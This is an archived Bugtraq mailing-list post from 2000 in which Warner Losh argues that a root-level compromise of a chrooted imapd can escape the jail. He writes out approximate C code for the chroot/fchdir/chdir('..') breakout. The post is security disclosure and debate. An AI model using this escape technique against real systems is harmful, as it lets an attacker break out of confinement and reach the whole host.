Bugtraq mailing list archives
Re: response to the bugtraq report of buffer overruns in imapd LIST command
From: imp () VILLAGE ORG (Warner Losh)
Date: Tue, 18 Apr 2000 00:21:36 -0600
In message <MailManager.956021099.15421.mrc () Ikkoku-Kan Panda COM> Mark Crispin writes: : Last but not least, I am very interested in Kris Kennaway's claim : that "It may also be possible to break out of the chroot jail on : some platforms." If true, it represents a huge root-level security : hole on those platforms. I simply do not believe the claim. I : would like to know if there is some substance to this claim, or if : it was mere speculation. The claim is 100% real. I have code that will do it, and the code has been well known since at least the mid 1990's (when I first encountered it) and likely dates back much further than that. With root privs, it is definitely possible to break out of a chroot jail by chrooting down a level or two, and then using chdir .. to climb up to root, since that gives the user an access outside of the jailed code. It does require breaking root to do that, unless the current directory is outside of the chroot'd location, in which case anybody can do this. The code is approximately: fd = open(".", O_RONLY); mkdir("foo"); chroot("foo"); /* cwd now outside the jail */ fchdir(fd); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir(".."); /* Most likely at / now */ chroot("."); More subtle ways to deal with the finding / problem are left as an excersize to the reader. Believe what you will, this is true. Variations on the above code work on all systems I've tried it on, except for FreeBSD's jail code. Warner
Current thread:
- xfs security issues (fwd), (continued)
- xfs security issues (fwd) Chris Evans (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- RUS-CERT Advisory 200004-01: GNU Emacs 20 RUS-CERT, University of Stuttgart (Apr 18)
- More vulnerabilities in FP Narrow (Apr 18)
- Re: More vulnerabilities in FP The Cyberiad (Apr 19)
- Re: More vulnerabilities in FP Ron van Daal (Apr 22)
- Re: More vulnerabilities in FP The Cyberiad (Apr 19)
- AVM's Statement eAX [Teelicht] (Apr 19)
- Adtran DoS Mike Ireton (Apr 19)
- FreeBSD Security Advisory: FreeBSD-SA-00:13.generic-nqs FreeBSD Security Officer (Apr 19)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Warner Losh (Apr 17)
- pwdump2 for Active Directory Todd Sabin (Apr 18)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Henrik Nordstrom (Apr 18)
- Cooments on the dvwssr.dll vulnerability threads Iván Arce (Apr 17)
- Re: Cooments on the dvwssr.dll vulnerability threads David LeBlanc (Apr 18)
- Last call for extended abstracts - Raid 2000 - Deadline is April 30th Herve Debar (Apr 18)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Kris Kennaway (Apr 17)